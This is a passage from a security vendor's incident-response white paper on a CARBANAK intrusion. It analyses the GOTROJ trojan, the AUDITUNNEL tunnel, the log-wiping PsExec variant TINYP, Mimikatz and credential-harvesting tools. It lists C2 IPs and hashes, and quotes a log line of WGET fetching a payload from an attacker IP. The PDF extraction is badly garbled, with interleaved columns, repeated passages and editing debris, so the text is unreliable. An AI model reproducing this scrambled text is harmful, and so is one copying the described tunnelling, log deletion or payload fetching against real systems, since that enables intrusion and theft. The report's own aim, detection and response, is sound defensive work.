Figure 23: Example Usage of PSCAN Port Scanning Tool
: pscan
: 10,340 bytes
: pscan
: 0f1c4a2a795fb58bd3c5724af6f1f71a
: 039f814cdd4ac6f675c908067d5be1d6f9acc31f
File SizeFigure
: 10,340
bytes
23: Example
Usage of PSCAN Port Scanning Tool
Table 9: File Information for PSCAN
: 0f1c4a2a795fb58bd3c5724af6f1f71a
File Name
: pscan
Their
decisions
which systems to access indicated that their next intended action was to gain
SHA1
:in039f814cdd4ac6f675c908067d5be1d6f9acc31f
access:to 10,340
the Windowsbytes
Server environment. The attackers continued to conduct internal
Deleted:
File Size
reconnaissance within both the Linux and Windows environments using stolen credentials to
0f1c4a2a795fb58bd3c5724af6f1f71a
Table
Information
PSCAN
access:Linux
systems via SSH
and 9:
theFile
WINEXE
utility tofor
access
Windows systems. The actionsDeleted:
SHA1
: 039f814cdd4ac6f675c908067d5be1d6f9acc31f
on-objective
during this time was composed of mapping the internal network with the PSCAN
utility and collecting host information via resident Linux and Windows administrative commandTheir
decisions in which systems to access indicated that their next intended
line utilities.
Table 9: File Information for PSCAN
action was to gain access
to the Windows Server environment. The attackers
continued
conduct
internal
reconnaissance
within
both
theintended
Linux and action was to ga
Their decisions in which systems to access
indicated that
their
next
WindowsServer
environments
using stolen
credentials
to continued
access Linuxto
systems
via internal
access to the Windows
environment.
attackers
conduct
WINEXE
utility
access
Windows
systems.
actions-onreconnaissance within both the Linux and Windows environments using stolen credentials to
Page 29
objective
composed
of mapping
the internal
network
access Linux systems
viaduring
SSH this
andtime
thewas
WINEXE
utility
to access
Windows
systems.
The actio
on-objective during
thisPSCAN
time was
of mapping
the internal
network
with the PSCAN
with the
utilitycomposed
and collecting
host information
via resident
Linux and
utility and collecting
hostadministrative
informationcommand-line
via residentutilities.
Linux and Windows administrative comman
Windows
line utilities.
4.4 WINDOWS COMPROMISE AND MALICIOUS FILES
4.4.1 GOTROJ Remote Access Trojan
On D+30, the attackers installed a Windows Trojan, written in Go, as a
Windows Service on one of the two primary Active Directory Domain
Controllers. They would move to utilizing the GOTROJ as their primary
method of ingress for the duration of the engagement. The GOTROJ Trojan
communicated with C2 IP address 107.181.246.146 over TCP/443 for its
remote access channel. This Trojan was much more fully featured than the
WHITE PAPER
previous tools utilized by the attackers to this point, with eight primary
functions designated by a command issued by the attackers. The commands
and their functionality are shown in Table 10.
Command
Function
Display process listing
#shell
Begin interactive command shell
#kill
Remove Windows Service and Malware
#info
Get system information
#wget
Download function via wget HTTP
#wput
Upload function via wput FTP
#name
Get hostname of victim
#service
Install malware as Windows Service with
Service Name of
WindowsCtlMonitor
Table 10: Decoded Commands for GOTROJ Trojan
The commands are stored within the binary in an XOR encrypted segment,
which is decrypted shortly after execution with the XOR key of
dmdar,
0x646D646172. The section of code which calls the c_gosh_xstr_XorCrypt()
The!Shadows!of!Ghosts!
function to decrypt the commands is shown in Figure! 24. Case!Study:!CARBANAK!
24: XOR Command Decryption Method
FigureFigure
24: XOR
Command Decryption Method
This binary operates in one of two modes. The first is an ad hoc, interactive execution mode, in
which
the malware
executes
context
of a user
However,
if the
malware is
This binary
operates
in within
one ofthe
modes.
The account.
first is an
ad hoc,
interactive
executed as a user, there has to be a file named
xname.txt
in that user
s temporary directory
executionbymode,
in which variable
the malware
executes
within
thefound
context
ofthis
referenced
the environment
%TEMP%.
As this file
was not
during
engagement and is not dropped by any of the tools used by the attackers, its contents are not
user account. However, if the malware is executed as a user, there has to
known. However, when the malware begins to communicate with its C2, the contents of the file
are the first thing encrypted and sent to the C2 server. The second method of GOTROJ
utilization is execution under a Windows Service as a method of persistence. The attackers used
this method of execution during this engagement, installing the GOTROJ binary as a service
named WindowsCtlMonitor.
Deleted:
Deleted: Deleted:
Deleted: .
Deleted:
Deleted:
Deleted:
WHITE PAPER
be a file named
xname.txt
in that user
s temporary directory referenced by
the environment variable
%TEMP%.
As this file was not found during this
engagement and is not dropped by any of the tools used by the attackers, its
contents are not known. However, when the malware begins to communicate
with its C2, the contents of the file are the first thing encrypted and sent to
the C2 server. The second method of GOTROJ utilization is execution under a
Windows Service as a method of persistence. The attackers used this method
of execution during this engagement, installing the GOTROJ binary as a
service named WindowsCtlMonitor.
The network communication protocol this malware uses contains a very
simplistic, but specific, header and format. The traffic sent and received
by this malware is XOR encrypted with an XOR key that changes for every
message sent or received. An example of the format in its encrypted form is
shown in Figure 25.
BA 45 BA B2 BA BA BA 99 C9 D2 DF D6 D6 B7 B0
Yellow = Null Bytes
Pink = ID Byte
Green = Length Byte
Grey = Message
.E.............
Figure 25: Annotated Encrypted Form of GOTROJ Communication
Once decrypted with the XOR key (byte BA in the example above), the
formatting of the message becomes considerably clearer. An illustration of
this is shown in Figure 26.
00 FF 00 08 00 00 00 23 73 68 65 6C 6C 0D 0A
Yellow = Null Bytes
Pink = ID Byte
Green = Length Byte
Grey = Message
.......#shell..
Figure 26: Annotated Decrypted Form of GOTROJ Communication
Given this simplistic method of formatting and decryption, RSA analysts were
able to effectively decrypt this traffic for review during the investigation,
greatly increasing visibility into attacker actions. However, given that this
malware utilizes a TCP socket connection for transport communications
in a tunneling form, the custom communications protocol does not take
packet boundaries into account in its design. Therefore, a single message
may traverse multiple packets with no additional control bytes, such as the
ID byte or length. Given this case, the method of decrypting the traffic was
made more effective by extracting the payload above Layer 4 and decrypting
that data independent of any data within Layers 2-4. The file information
WHITE PAPER
for the three versions of GOTROJ observed in this incident is shown in
Table 11, Table 12 and Table 13. All binaries use the same C2 IP address of
107.181.246.146.
File Name : ctlmon.exe
File Size : 4,392,448 bytes
: 370d420948672e04ba8eac10bfe6fc9c
SHA1
: 450605b6761ff8dd025978f44724b11e0c5eadcc
Table 11: File Information for GOTROJ Version 1
File Name : ctlmon_v2.exe
File Size : 4,047,691 bytes
: 5ddf9683692154986494ca9dd74b588f
SHA1
: 08f527bef45cb001150ef12ad9ab91d1822bb9c7
Table 12: File Information for GOTROJ Version 2
File Name : ctlmon_v3.exe
The!Shadows!of!Ghosts!
File Size : 4,063,744 bytes
Case!Study:!CARBANAK!
: f9766140642c24d422e19e9cf35f2827 !
Table 12: File Information for GOTROJ Version 2
SHA1
: 7b27771de1a2540008758e9894bfe168f26bffa0
File Name
File Size
SHA1
: ctlmon_v3.exe
: 4,063,744
Table 13: bytes
File Information for GOTROJ Version 3
: f9766140642c24d422e19e9cf35f2827
: 7b27771de1a2540008758e9894bfe168f26bffa0
4.4.2 AudiTunnel (Windows Version)
13: File
Information
for GOTROJ
The attackers alsoTable
utilized
a tunneling
binary
similarVersion
to the 3AUDITUNNEL
binary used(Windows
on the compromised
4.4.2! AudiTunnel
Version) Linux systems. The svcmd.exe binary
primary
purpose
tunnel
traffic
to thetoattackers
C2 using XOR
The attackers also utilized a tunneling
binary
similar
the AUDITUNNEL
binary used on the
encoding
with
a key of
0x41.
This version
of primary
AUDITUNNEL
hard-coded
compromised
Linux
systems.
svcmd.exe
binary
purposeiswas
to tunnel traffic to
the attackers
C2 using XOR
encoding
with a key of The
0x41.
version is
of clearly
AUDITUNNEL
is hardto communicate
with
IP 185.86.151.174.
C2This
IP address
seen
coded to communicate with IP 185.86.151.174. The C2 IP address is clearly seen within the
withinofthe
strings
file, 27.
as shown in Figure 27.
ASCII strings
theASCII
file, as
shownofinthe
Figure
Figure 27: C2 IP Address in ASCII Strings of svcmd.exe
Figure 27: C2 IP Address in ASCII Strings of svcmd.exe
The IP address it communicates with is hard-coded, as is the encryption key used for its
The IP address
it communicates
with
is hard-coded,
as is the
encryption
communications.
After establishing
the TCP
connection
and socket,
svcmd.exe
will XOR the send
and receive
buffers
against
value
0x41.
Given
connects
address
key used for its communications. After establishing the TCP connection over
TCP/443, without the necessary visibility, defenders might mistake it for HTTPS encrypted
andencryption
socket, svcmd.exe
will XOR
the send
and receive
buffers against a value
traffic. The
code segment
is shown
in Figure
of 0x41. Given it connects to the C2 IP address over TCP/443, without the
necessary visibility, defenders might mistake it for HTTPS encrypted traffic.
The encryption code segment is shown in Figure 28.
WHITE PAPER
Figure 27: C2 IP Address in ASCII Strings of svcmd.exe
The IP address it communicates with is hard-coded, as is the encryption key used for its
communications. After establishing the TCP connection and socket, svcmd.exe will XOR the
and receive buffers against a value of 0x41. Given it connects to the C2 IP address over
TCP/443, without the necessary visibility, defenders might mistake it for HTTPS encrypted
traffic. The encryption code segment is shown in Figure 28.
The encryption code segment is shown in Figure 28.
Figure 28: XOR Byte Encryption Loop for Send and Receive Buffer
The file information for the Windows AUDITUNNEL binary is shown in Table 14.
File Name : svcmd.exe
File Size : 47,104 bytes
: 8b3a91038ecb2f57de5bbd29848b6dc4
SHA1
: 54074b3934955d4121d1a01fe2ed5493c3f7f16d
Table 14: File Information for AUDITUNNEL (Windows Version)
4.5 WINDOWS SECONDARY ATTACKER TOOLS
4.5.1 TINYP
While the WINEXE binary was used to migrate from the Linux environment
to the Windows environment, a modified version of SysInternals PSEXEC
was used to move throughout the Windows environment. This modified
PSEXEC binary, named TINYP by the attackers, was the primary lateral
movement mechanism. Two versions of TINYP were used during this
intrusion (v.0.7.6.2 and v.0.7.7.4), with the attackers downloading the binaries
under the filenames ti1.bmp, tinyp1.bmp, tinyp2.bmp, tineyp3.bmp, tinyp4.bmp
and ps.bmp. Once downloaded, the binary was renamed to ps.exe for use in
lateral movement. While both versions of TINYP have all of the features of
normal SysInternals PSEXEC, they also include additional functionality. These
functionalities are given at the command line at execution, just like PSEXEC.
The usage list of all of TINYP
s functions is shown in Table 15.
WHITE PAPER
Argument
Function
\\
Remote system to communicate with
Do not load user profile on target host
-copyself
Copy TINYP to C:\Windows on target host
-cleanup
Delete System Event Log
-getfiles
Download files from target host
-copyfiles
Upload files to target host $ADMIN share
Run command non-interactively
-i
Run command interactively to
-u
Username flag
-p
Password flag
Run as SYSTEM on target host
Command to run on the target host.
Running cmd gives interactive shell
Table 15: TINYP Arguments and Functions
The primary modifications made to the base SysInternals PSEXEC are the
functions associated with the
copyself,
cleanup,
getfiles, and
copyfiles
arguments. The
copyself and
copyfiles arguments will copy a file to the
target remote system via SMB/CIFS, with that file either being a copy
of TINYP itself or an explicitly designated file, respectively. The
getfiles
argument will move files in the opposite direction, downloading specified
files from the target remote host to the source host via SMB/CIFS. Lastly,
the TINYP tool contains an argument to specifically delete entries from the
Windows System Event Log. While this is an attempt to cover tracks as the
attacker moves throughout the environment, it is important to note that this
only affects the System Event Log, leaving Application, Security and servicespecific Windows Event Logs to retain data useful to investigators.
The TINYP tool was used primarily with the Windows Command Processor
cmd.exe as the final argument for remote command shell access. Once the
attacker closed the remote session, the TINYP tool would:
1. Check if it copied itself to the $ADMIN share of the remote system (C:\
Windows). If so, it would delete itself from that location.
2. Remove the PSEXESVC Windows Service and the psexesvc.exe PSEXEC
Remote Service binary from the remote system.
3. Delete the System Event Log from the remote system.
attacker moves throughout the environment, it is important to note that this only affects the
System Event Log, leaving Application, Security and service-specific Windows Event Logs to
Deleted: ,
retain data useful to investigators.
WHITE PAPER
The TINYP tool was used primarily with the Windows Command Processor cmd.exe as the final
argument for remote command shell access. Once the attacker closed the remote session, the
TINYP tool would:
1.! Check if it copied itself to the $ADMIN share of the remote system (C:\Windows). If so, it
would delete itself from that location.
2.! Remove the PSEXESVC Windows Service and the psexesvc.exe PSEXEC Remote Service
binary from the remote system.
3.! Delete the System Event Log from the remote system.
Evidence of of
thisthis
activity,
in thein
form
a lab execution
of this tool, is
in Figure
Evidence
activity,
theofform
of a lab execution
ofshown
this tool,
is shown
Figure
Sample
Execution
TINYP
v.0.7.7.4
Figure 29.
The file information for TINYP versions 0.7.6.2 and 0.7.7.4 is shown in Table 16 and Table 17,
Figure 29: Sample Execution of TINYP v.0.7.7.4
respectively.
Filefile
Name
: TINYP2.bin
information
for TINYP versions 0.7.6.2 and 0.7.7.4 is shown in Table
File Size
: 277,504 bytes
16 and Table 17, respectively.
Page 35
File Name : TINYP2.bin
File Size : 277,504 bytes
: 7393cb0f409f8f51b7745981ac30b8b6
SHA1
: 6c17113f66efa5115111a9e67c6ddd026ba9b55d
Table 16: File Information for TINYP v.0.7.6.2
File Name : ps.exe
File Size : 234,496 bytes
: c4d746b8e5e8e12a50a18c9d61e01864
SHA1
: c020f8939f136b4785dda7b2e4b80ced96e23663
Table 17: File Information for TINYP v.0.7.7.4
4.5.2 WGET (UIAUTOMATIONCORE.DLL.BIN)
As done previously, the attackers used WGET version 1.11.4 to download
binaries before execution. However, the WGET used was renamed to
UIAutomationCore.dll.bin. Evidence of this is shown in execution of the binary
in Figure 30.
Deleted:
Deleted:
Comment [A
Deleted: are
SHA1
: 6c17113f66efa5115111a9e67c6ddd026ba9b55d
Table 16: File Information for TINYP v.0.7.6.2
File Name
File Size
SHA1
: ps.exe
: 234,496 bytes
: c4d746b8e5e8e12a50a18c9d61e01864
: c020f8939f136b4785dda7b2e4b80ced96e23663
WHITE PAPER
Table 17: File Information for TINYP v.0.7.7.4
4.5.2! WGET (UIAutomationCore.dll.bin)
As done previously, the attackers used WGET version 1.11.4 to download binaries before
execution. However, the WGET used was renamed to UIAutomationCore.dll.bin. Evidence of this
is shown in execution of the binary in Figure 30.
FigureFigure
30: WGET
Renamed to UIAutomationCore.dll.bin
30: WGET Renamed to UIAutomationCore.dll.bin
This
is observed
downloading
a version a
ofversion
the TINYP
IP address
Thisbinary
binary
is observed
downloading
of tool
thefrom
TINYP
tool from IP
185.61.148.145 in the RSA NetWitness Endpoint Application Tracking Data shown in Figure 31.
address 185.61.148.145 in the RSA NetWitness Endpoint Application
ECATSERVER,AGENT_HOSTNAME,2017-05-02
Tracking
Data shown in Figure 31.
12:51:43.0671260,UIAutomationCore.dll.bin,TINYP2.bmp,C:\Windows\SysWOW64\zhTW\,NULL,UIAutomationCore.dll.bin
http://185.61.148.145:443/TINYP2.bmp
ECATSERVER,AGENT_HOSTNAME,2017-05-02
Figure 31: Download of TINYP Binary with UIAutomationCore.dll.bin
12:51:43.0671260,UIAutomationCore.dll.bin,TINYP2.bmp,C:\
file information is shown in Table 18.
Windows\SysWOW64\zh-TW\,NULL,UIAutomationCore.dll.bin
http://185.61.148.145:443/TINYP2.bmp
File
Name
: UIAutomationCore.dll.bin
File Size
: 401,408 bytes
: bd126a7b59d5d1f97ba89a3e71425731
of TINYP Binary with UIAutomationCore.dll.bin
SHA1 Figure 31::Download
457b1cd985ed07baffd8c66ff40e9c1b6da93753
The file information is shown in Table 18.
File Name : UIAutomationCore.dll.bin
File Size : 401,408 bytes
: bd126a7b59d5d1f97ba89a3e71425731
SHA1
: 457b1cd985ed07baffd8c66ff40e9c1b6da93753
Page 36
Table 18: File Information for WGET (UIAutomationCore.dll.bin)
4.5.3 PSCP (PuTTY Secure File Copy)
The PSCP tool used by the attackers was an unmodified version of PuTTY
Secure File Copy v0.67. The file information is shown in Table 19.
File Name : pscp.bin
File Size : 359,336 bytes
: b3135736bcfdab27f891dbe4009a8c80
SHA1
: 9240e1744e7272e59e482f68a10f126fdf501be0
Table 19: File Information for PSCP
4.5.4 Mimikatz Variant (32-bit, 64-bit)
For credential harvesting within the Windows environment, the attackers
downloaded two files named image32.bmp and image64.bmp. These files
were subsequently renamed to xxx32.exe and xxx64.exe, respectively. In
reviewing these files and their activity, RSA IR determined that these were
implementations of the sekurlsa_acquireLSA() functionality of the Mimikatz
credential harvesting tool. The file information is shown in Table 20 and
Table 21.
Deleted:
WHITE PAPER
File Name : xxx32.exe
File Size : 528,896 bytes
: 6499863d47b68030f0c5ffafaffb1344
SHA1
: 2197e35f14ff9960985c982ed6d16d5bd5366062
Table 20: File Information for MIMIKATZ Variant (32-bit)
File Name : xxx64.exe
File Size : 589,312 bytes
: 752d245f1026482a967a763dae184569
SHA1
: 355603b1922886044884afbdfa9c9a6626b6669a
Table 21: File Information for MIMIKATZ Variant (64-bit)
4.5.5 CCS
CCS is a system process and library identifier that, when no arguments are
given, will print the currently running processes and their process IDs to both
STDOUT and a file named _out.log in the current working directory. If CCS
executed with the
modules
argument, it printed the running processes and
their process IDs, as well as all DLLs loaded by each process. This operation
also prints the output to both STDOUT and the _out.log file. Additionally,
the _out.log file will not be replaced; rather, it will be appended with every
subsequent execution. The file information is shown in Table 22.
File Name : ccs.bmp
File Size : 82,944 bytes
: d406e037f034b89c85758af1a98110be
SHA1
: 6bc46528da6cd224fa5e58ccd9df5b05c46c673d
Table 22: File Information for CCS
4.5.6 Infos.bmp
The INFOS tool was a host reconnaissance tool obtaining browser history,
browser login data and RDP logs from the system, and it outputs them to
STDOUT. The attackers used this tool to harvest credentials, identify internal
web applications and observe the common RDP connections and accounts
used on the Windows servers. The file information is shown in Table 23.
File Name : infos.bmp
File Size : 494,080 bytes
: ab8bed25f9ff64a4b07be5d3bc34f26b
SHA1
: 42ce9c2bd246a0243fa91309938042e434b39876
Table 23: File Information for INFOS
The INFOS tool was a host reconnaissance tool obtaining browser history, browser login data
and RDP logs from the system, and it outputs them to STDOUT. The attackers used this tool t
WHITE RDP
PAPER
harvest credentials, identify internal web applications and observe the common
connectio
and accounts used on the Windows servers. The file information is shown in Table 23.
File Name
File Size
SHA1
: infos.bmp
: 494,080 bytes
: ab8bed25f9ff64a4b07be5d3bc34f26b
: 42ce9c2bd246a0243fa91309938042e434b39876
Table 23: File Information for INFOS
4.5.7 PSCAN (Windows Version)
4.5.7! PSCAN The
(Windows
Version)
attackers also
utilized a version of the PSCAN tools described in Section
4.3.3.utilized
This version
differsof
from
Linux version
previously discussed
only
The attackers also
a version
thethe
PSCAN
tools described
in Section
4.3.3.
This versi
differs from theitsLinux
version
previously
discussed
only
usage
message,
which
is slightly
usage message, which is slightly more verbose. An example of the usage
more verbose. text
An example
usage
text
execution
shown
Figure
and execution is shown in Figure 32.
Figure
Example
Executionand
and Usage
Usage Text
ofof
Windows
Version
of PSCAN
Figure
32: 32:
Example
Execution
Text
Windows
Version
of PSCAN
The file
is shown
The file information
isinformation
shown in Table
24.in Table 24.
File Name
File Size
SHA1
File Name
: pscan.bmp
: pscan.bmp
: 65,024
bytes
File Size
: 65,024
bytes
d825fbd90087d2350e89cbf205a1b71c
: d825fbd90087d2350e89cbf205a1b71c
: ca5e195692399dca99a4d8299dc9ff816168a6dc
SHA1
: ca5e195692399dca99a4d8299dc9ff816168a6dc
Table 24: File Information for PSCAN (Windows Version)
Table 24: File Information for PSCAN (Windows Version)
4.6! Detection, Tracking and Response
4.6 DETECTION, TRACKING, AND RESPONSE
Given that the Given
attackers
leftattackers
very little
running running
on anyon
compromised
host,
that the
leftconsistently
very little consistently
downloaded tools as they needed them and removed those tools immediately after use,
compromised host, downloaded tools as they needed them and removed
determining their movement throughout the environment via traditional forensic methods wa
those tools immediately after use, determining their movement throughout
not a timely option. In a significant portion of the attackers
actions-on-objective and lateral
environment
via traditional
forensic
methods
was not
timely option.
movement, thethe
majority
of their
activity was
contained
within
thea functions
of the Windows
In a significant
portion
of the
attackers
actions-on-objective
Command Processor
cmd.exe.
Given
this,
much of
their actions did and
notlateral
cause subsequent
movement, the majority of their activity was contained within the functions of
the Windows Command Processor cmd.exe. Given this, much of their actions
did not cause subsequent process execution. Additionally, the attackers
utilized several different filenames for their toolsets, ensured a tool was not
executed with the same name it was downloaded with, used multiple versions
to throw off atomic hashing IOCs and maintained at least two different
ingress points with non-related IP addresses.
Given that the attackers had been in the environment for over a month at the
time response began, traditional host and network intrusion detection systems
within the organization
s security stack proved ineffective to combat these
actors. Additionally, the attackers had full access to the Linux and Windows
environments at the time of response. However, by engaging and enabling
analysts to periodically conduct RSA Threat Hunting with a solid methodology,
WHITE PAPER
this threat was still detected despite not being detected by IDS, or buried in
ineffective alerts. Once detected, the root cause was determined, the threat
was effectively and recursively scoped across the environment, additional
next-level visibility into attacker actions was obtained, and a plan was created
and executed to successfully remediate the threat. Given that time is the
most critical resource during incident response, any reduction to the 10:1
analysis time versus attack time ratio can significantly increase the chances of a
successful eradication event and continued successful remediation. In this case,
due to effective visibility, solid methodology and processes, and motivated
and properly enabled analysts, the threat was contained and remediated after
nine days of response efforts. The remediation involved significant internal
infrastructure changes be enacted before the expulsion event, including
implementation of redesigned network segmentation, replacement of several
significant environment-wide data and process automations, and removal
and replacement of most administrative authentication methods within the
environment. Consistent monitoring and RSA Threat Hunting operations
conducted post-remediation, with the necessary visibility, allowed for an active
and adaptive response in which any subsequent actor activity was observed,
analyzed and responded to appropriately.
With the care in which the attackers moved throughout the environment, RSA
IR relied on RSA NetWitness Endpoint and RSA NetWitness Logs and Packets
to coordinate host and network visibility and create non-standard, aggregate,
behavioral-based indicators, resulting in actionable IOCs that allowed RSA
IR to track the attackers in near real time. Here, we discuss some of the ways
in which RSA IR was able to determine and track attacker actions throughout
the environment.
4.6.1 Network Visibility and Indicators
This section discusses the methodology and RSA NetWitness Suite queries
and content used by RSA IR during this investigation. The methodology in this
section uses the OCOKA defensive model16 and is described in detail in the
RSA Incident Response NetWitness Hunting Guide. 17
The CARBANAK attackers conducted actions through a variety of network
communication methods. Additionally, as the attackers were prone to
downloading tools when they needed them, in an effort to leave as little
on disk as possible, this became a primary method of tracking attacker
location throughout the environment. The attackers primarily used WGET to
download tools when needed, and they consistently did so directly to an IP
address over TCP port 443.
Heuser, Riley;
The Myth of the Easy Button Approach to Information Security
; https://www.
rsa.com/en-us/blog/2017-07/infosec-easy-button-myth
RSA Incident Response NetWitness Hunting Guide
; https://community.rsa.com/docs/DOC-62341
WHITE PAPER
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
Therefore,
using thequery
following
query
would
thetodataset
to the attacker
Therefore, using
the following
would
reduce
thereduce
dataset
the attacker
activity with
considerably
high fidelity:
activity
with considerably high fidelity:
direction
= outbound
&& service
= 80
clientbegins
begins
wget
wget
= 443
direction
= outbound
&& service
= 80
&&&&
client
&&tcp.dstport
tcp.dstport
= 443 &&
service.analysis
direct
http
request
service.analysis =
direct to ip http request
Execution ofExecution
this query
theagainst
network
the following
sessions, shown in
of against
this query
thedataset
networkresulted
datasetin
resulted
in the following
Figure 33. sessions, shown in Figure 33.
Figure
Figure 33:
33: Query
Query Results
Results for Malicious Tool Downloads
This behavioral
could also
modified
adhere to
toadhere
changes
attacker
actions or increasing
This IOC
behavioral
IOC be
could
also beto
modified
to in
changes
in attacker
false positives by including the Directory Meta to only equal the root directory, or include the
actions or increasing false positives by including the Directory Meta to only
Action Meta to only include HTTP GET Requests. As we see in Figure 33, though the attackers
the root
directory,
include the
Meta
to only
include
HTTP
would keepequal
changing
filenames,
IP or
addresses
andAction
WGET
versions
used,
actions
associated
with
this TTP were
still able
besee
detected
throughout
Requests.
Astowe
in Figure
33, thoughthe
theengagement.
attackers would keep changing
filenames, IP addresses and WGET versions used, actions associated with this
The primary method of interacting with the Linux Syslog server within the Linux environment
were still ablevia
to SSH
be detected
throughout
the (created
engagement.
consisted ofTTP
communicating
over a reverse
tunnel
by the AUDITUNNEL
The primary method of interacting with the Linux Syslog server within the
Linux environment consisted of communicating via SSH over a reverse tunnel
(created by the AUDITUNNEL binary). Given that the SSH traffic would be
encapsulated within the reverse tunnel created by AUDITUNNEL, the Layer
3 and Layer 4 headers would be representative of the tunnel itself, while the
Page 40
WHITE PAPER
network payload above Layer 4 would be representative of the SSH protocol.
With this knowledge, we can begin to build behavioral IOC queries to track
this activity, beginning with the following:
direction = outbound && service = 22
This query will return all results representative of both outbound SSH
communication as well as inbound SSH communication over the reverse
tunnel. However, this query is of particularly low fidelity, especially when
in a Linux-heavy environment. By reviewing additional context around
what we know of this attacker communication, this query can be narrowed
significantly. In reviewing the activity associated with the AUDITUNNEL
auditd and svcmd.exe tunneling binaries, both communicate outbound over
TCP port 443. Adding this to our query gives additional context around the
transport mechanism, though not the communication mechanism (SSH).
As the SSH attacker traffic is associated with the SSHDOOR trojanized
OpenSSH 5.3 binaries, and by specification SSH exchanges client and server
version strings at the beginning of each session, we can add version context
to the communication mechanism as well. The addition of these two aspects
results in the following query:
direction = outbound && service = 22 && tcp.dstport = 443 && client =
openssh_5.3
Execution of this query against the network dataset returns
the following
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
results, as shown in Figure 34.
Figure
Figure34:
34:Tunneled
TunneledSSH
SSHQuery
Query Results
Results
In the resulting data, we observe that in all sessions returned, the client version string and the
server version string match. This can be added to the query to increase the fidelity of the IOC if
there are still false positives present. However, there is still the case in which the AUDITUNNEL
WHITE PAPER
In the resulting data, we observe that in all sessions returned, the client
version string and the server version string match. This can be added to
Figure 34: Tunneled SSH Query Results
the query to increase the fidelity of the IOC if there are still false positives
In thepresent.
resultingHowever,
data, we observe
all case
sessions
returned,
client version binary
string and the
there isthat
stillinthe
in which
the the
AUDITUNNEL
server version string match. This can be added to the query to increase the fidelity of the IOC if
encoding.
In However,
this case,there
the traffic
willcase
appear
as binary
thereutilizes
are still the
falseXOR
positives
present.
is still the
in which
the AUDITUNNEL
binary
utilizes
encoding.
this
case,
traffic
will
appear
binary
network
network communications. In order to ease the effort of detecting this
communications. In order to ease the effort of detecting this activity, content for RSA
activity,
content
for RSA
NetWitness
Logs
Packets
were
created
NetWitness
Logs
and Packets
were
created based
onand
the initial
Client
Hello
stringbased
passed when
beginning
AUDITUNNEL
communication.
example
this
detection
is shownXOR
in Figure
on the initial
Client Hello
string passed when beginning AUDITUNNEL
communication. An example of this detection is shown in Figure 35.
Dele
Dele
Dele
Dele
Dele
Figure 35: AUDITUNNEL
Client Hello
Payload Detection and Meta
Figure 35: AUDITUNNEL
Client Hello
Payload Detection and Meta
The GOTROJ utilized two methods of network communication. The first and
primary method was a custom binary XOR encoded protocol communicating Page 42
outbound over TCP port 443. We can begin building our IOC query here with
the following:
direction = outbound && risk.info =
unknown service over ssl port
&& tcpflags =
&& ioc =
binary handshake
This query will identify the beginning of all outbound communications
over TCP port 443 in which data is being transmitted by both parties at the
beginning of the communication (ioc =
binary handshake
). While this will
find the GOTROJ control traffic, it will find many other things as well. This is
due to service = 0 being representative of any protocol for which there is not
an RFC standard parser built. This includes various proprietary protocols,
malicious custom protocols and even sending cleartext over a network tunnel.
To narrow this down some, we would want to look at byte transmission ratios
between the payloads of the communication. What we are really looking for is
conversational traffic, in which the ratio of the amount of data transmitted by
both parties is roughly equivalent (25-75% or so). To identify this, we would
add the Session Analysis Meta for this type of byte transmission ratio, as
shown below:
direction = outbound && risk.info =
unknown service over ssl port
&& tcpflags =
&& ioc =
binary handshake
&& analysis.session =
medium transmitted outbound
The direction meta can be removed in this instance if necessary, as the medium
transmitted outbound meta includes the condition. The resulting traffic from
the network dataset is shown in Figure 36.
would want to look at byte transmission ratios between the payloads of the communication.
What we are really looking for is conversational traffic, in which the ratio of the amount of data
transmitted by both parties is roughly equivalent (25-75% or so). To identify
this, we
would add
WHITE
PAPER
the Session Analysis Meta for this type of byte transmission ratio, as shown below:
direction = outbound && risk.info =
unknown service over ssl port
&& tcpflags =
&& ioc =
binary handshake
&& analysis.session =
medium transmitted outbound
The direction meta can be removed in this instance if necessary, as the medium transmitted
outbound meta includes the condition. The resulting traffic from the network dataset is shown in
Figure 36.
Figure 36: GOTROJ Binary Control Traffic and svcmd.exe Beacon Traffic
At this point in the analysis, we want to look at any contextually interesting
The!Shadows!of!Ghosts!
meta within the analysis, compromise or risk meta groups.
In Figure
36, meta is
Case!Study:!CARBANAK!
created on these sessions for
xor encoded executable
! and
windows cli admin
commands.
This indicates that RSA NetWitness Suite observed a Windows
Figure 36: GOTROJ Binary Control Traffic and svcmd.exe Beacon Traffic
executable file
in the network traffic that was XOR encrypted with a oneAt
this
point
we want
to look
at any contextually
interesting meta
within the
byte key. Addinganalysis,
this meta
to the
windows
cli admin commands
indicates
that
analysis, compromise or risk meta groups. In Figure 36, meta is created on these sessions for
common
Windows
administrative
command
line
utilities,
such
whoami,
xor encoded executable
and
windows cli admin commands.
This indicates that RSA NetWitness
Suite observed a Windows executable file in the network traffic that was XOR encrypted with a
ipconfig
or the command prompt string
C:\Windows\system32>,
were
one-byte key. Adding this meta to the
windows cli admin commands
indicates that common
Windows administrative
command line
utilities, such
whoami,
ipconfig
or the command
observed
either in cleartext
or one-byte
encrypted.
In extracting
prompt string
C:\Windows\system32>,
were observed either in cleartext or one-byte XOR
payload
performing
the XOR
instruction
a key of 0xC0,
we of
observe
encrypted.and
In extracting
the payload
and performing
thewith
XOR instruction
with a key
0xC0, we
observe the command prompt string, as shown in Figure 37.
command prompt string, as shown in Figure 37.
Page 43
Deleted: ,
Deleted:
Deleted: .
Formatted: F
Deleted:
Deleted: ,
Deleted: ,
Deleted: ,
Deleted:
Figure 37: Identification of Windows Command Prompt in
Figure 37: Identification of Windows Command Prompt in XOR 0xC0 Decrypted Payload
While this query may include additional
traffic
not associated
with the attackers, it allowed RSA
XOR 0xC0
Decrypted
Payload
IR to significantly reduce the network dataset to a level where any included traffic could be
quickly reviewed for newly identified C2 IP addresses or false positive IP addresses that required
While
query
mayaccurately
include additional
not associated
withcustom
filtering.this
In order
to more
observe this traffic
communication,
RSA IR created
content for RSA NetWitness Suite. This content is released in the form of the Digital Appendix
attackers,
allowed
significantly
reduce
network
dataset
to a
associated with this report. An example of the meta created for this communication is shown in
Figure where
level
any included traffic could be quickly reviewed for newly identified
C2 IP addresses or false positive IP addresses that required filtering. In order
to more accurately observe this communication, RSA IR created custom
content for RSA NetWitness Suite. This content is released in the form of the
Digital Appendix associated with this report. An example of the meta created
for this communication is shown in Figure 38.
Deleted:
Deleted:
Deleted:
Comment [A
WHITE
PAPER
Figure 37: Identification of Windows Command Prompt in XOR 0xC0 Decrypted
Payload
While this query may include additional traffic not associated with the attackers, it allowed RSA
IR to significantly reduce the network dataset to a level where any included traffic could be
quickly reviewed for newly identified C2 IP addresses or false positive IP addresses that required
